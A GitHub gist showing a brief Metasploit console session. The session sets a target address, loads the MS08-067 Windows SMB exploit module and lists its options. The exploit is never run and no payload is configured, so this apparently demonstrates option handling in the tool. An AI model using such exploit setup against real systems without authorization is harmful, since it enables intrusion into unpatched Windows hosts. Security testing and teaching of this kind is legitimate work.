Skip to content

Instantly share code, notes, and snippets.

@wchen-r7
Created February 25, 2015 23:34
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save wchen-r7/774cca4123d1b9271cbf to your computer and use it in GitHub Desktop.
Save wchen-r7/774cca4123d1b9271cbf to your computer and use it in GitHub Desktop.
$ msfconsole
msf > set rhost 192.168.1.148
rhost => 192.168.1.148
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.148 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) >
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment